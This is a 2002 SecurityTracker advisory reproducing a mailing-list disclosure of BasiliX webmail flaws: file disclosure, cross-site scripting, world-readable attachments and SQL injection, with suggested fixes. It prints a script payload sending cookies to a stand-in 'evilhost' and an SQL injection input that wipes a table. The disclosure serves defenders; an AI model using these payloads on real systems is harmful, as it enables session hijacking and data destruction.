Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
BasiliX Mail Server Has Multiple Flaws That Disclose Files to or Execute SQL Commands from Remote Authenticated Users, Disclose Attachments to Local Users, and Let Remote Users Conduct Cross-site Scripting Attacks
|
|
SecurityTracker Alert ID: 1004574 |
|
SecurityTracker URL: http://securitytracker.com/id/1004574
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jun 19 2002
|
Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 1.1.0 and prior versions
|
Description:
Several vulnerabilities were reported in the BasiliX mail server. A remote authenticated user can view files on the system that are readable by the web server and possibly execute certain SQL statements. A local user may be able to view the attachments of mail users. A remote user can conduct cross-site scripting attacks against BasiliX users.
It is reported that a remote authenticated user can modify a PHP variable for the temporary location of uploaded files that will not be verified by BasiliX as a valid uploaded file. This allows the remote user to view any file on the same partition as the web server that is readable by the web server.
An input validation bug was reported in the Find Mail function. The 'Subject' header is reportedly displayed without being filtered and, when the user reads a message, the mail body is displayed without being filtered. A remote user can create and send a mail message that contains malicious Javascript in the body or in the subject field so that, when read by a target BasiliX user, the Javascript will be executed by the target user's browser. The code will run in the security context of the BasiliX mail server. As a result, the code will be able to access the target user's cookies associated with the web site running BasiliX and may be able to take actions on that web site acting as the target user.
Some demonstration scripting code is provided:
<script>self.location.href="http://[evilhost]/evil?"+escape(document.cookie)</script>
The server reportedly stores attached files in the '/tmp/BasiliX' directory and are readable by any local user.
A remote user can apparently insert SQL statements to be executed by the mail server's underlying SQL server. Some SQL statements used by the server may not encapsulate user-supplied data with apostrophes or quotes and thus are vulnerable.
The vendor has reportedly been notified.
|
Impact:
A remote authenticated user can view files on the system that are located on the same partition as the mail server and are readable by the web server. A remote authenticated user may be able to inject SQL statements to be executed by the underlying SQL database server. A local user on the mail server can view the attachments of BasiliX mail users. A remote user can conduct cross-site scripting attacks against BasiliX users to steal their authentication cookies.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: www.basilix.org/ (Links to External Site)
|
Cause:
Access control error, Input validation error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 19 Jun 2002 01:37:42 +0200 (CEST)
Subject: [VulnWatch] BasiliX multiple vulnerabilities
|
BasiliX multiple vulnerabilities
PROGRAM: BasiliX
VENDOR: Murat Arslan <arslanm@basilix.org> et al.
HOMEPAGE: http://basilix.org/
VULNERABLE VERSIONS: 1.1.0 and all previous versions
LOGIN REQUIRED: yes (some issues), no (some issues)
SEVERITY: high
DESCRIPTION:
"BasiliX is a webmail application based on PHP and IMAP, and powered with the
MySQL database server. It supports simple mail actions, sending/receiving
attachments, an addressbook with group capability, settings utility, multiple
languages, multiple folders and themes."
(direct quote from the program's project page at Freshmeat)
It is published under the terms of the GNU General Public License.
SECURITY HOLES:
1) The attachment capability in Compose Mail can be fooled into treating any
file on the web server as the uploaded file. This means that it is easy to
steal sensitive information on that server (like the /etc/passwd file), and
mail it off to someone.
When uploading files, PHP sets some global variables, one of which gives the
temporary location where the uploaded file was stored. PHP usually also sets
global variables with GET or POST form data. BasiliX doesn't check if the
attachment really was uploaded by the user, or if it just was some POST data
with the same format.
This issue can be fixed by using the is_uploaded_file() function, to see if a
file was in fact uploaded.
2) The program has got some cross-site scripting issues. In mail folders, in
Find Mail and when you read a message, the Subject mail header is shown
without removing any HTML tags. When a message is read, the mail body is also
shown without removing any HTML tags. This means that an attacker can include
JavaScript code in an e-mail message, and that it will be executed in the
user's browser when he or she looks at that message.
This can be used for stealing a user's cookies, to allow the attacker to take
over the user's session, by including JavaScript code like this:
<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>
It can also be used as a form of Denial of Service attack. If there is a
message in your inbox folder that immediately redirects your browser to
Slashdot as soon as you enter that folder, it gets rather hard to read your
e-mail.
This can be fixed by always using the htmlspecialchars() function when
printing variables that shouldn't contain HTML tags.
3) The attached files are saved in /tmp/BasiliX. They are readable by all
users, and it seems like they never get deleted. This means that anyone who
has got shell access to the server, or who can upload web scripts to it, can
read all files any user has ever attached to an e-mail.
4) BasiliX has got some SQL Injection holes. If you have an SQL statement
where data from outside is not placed in apostrophes or quotes, like this:
DELETE FROM table WHERE id=$id
you can wipe all rows in the table by giving $id the value "id". This will
execute the statement:
DELETE FROM table WHERE id=id
The way to fix this is to put all outside data in apostrophes or quotes, like
this:
DELETE FROM table WHERE id='$id'
or to use PHP's is_numeric() function.
COMMUNICATION WITH VENDOR:
The vendor was contacted on the 19th of May. He replied, and we discussed
these issues in a couple of mails. I haven't heard from him since the 26th of
May. No fixed version has been released yet.
To be fair to Murat, he had some excuse for not working on the program. On the
other hand, I think that the users of BasiliX want a secure mail program and
not just excuses.
// Ulf Harnhammar
ulfh@update.uu.se
|
|
Go to the Top of This SecurityTracker Archive Page
|
